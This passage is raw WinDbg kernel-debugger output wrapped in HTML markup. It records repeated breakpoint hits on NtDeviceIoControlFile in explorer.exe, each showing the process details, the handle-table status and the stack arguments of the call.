/><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 
00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: 
"Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: 
"Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 
00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span 
style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f5a4 00120090 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00169078 00000030</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br 
style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6cc 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 
Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f64c 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span 
style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000f79b8 00000120</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br 
style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000de808 0000016c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel 
Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000218 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f71c 0021009a 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00c9f6b8 0000003c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span 
style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br 
style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br 
style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f784 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 01fc8008 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier 
New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f500 00120003 00c9f5ac</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00168858 00000100</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier 
New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 
HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier 
New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f514 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 0018ad70 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier 
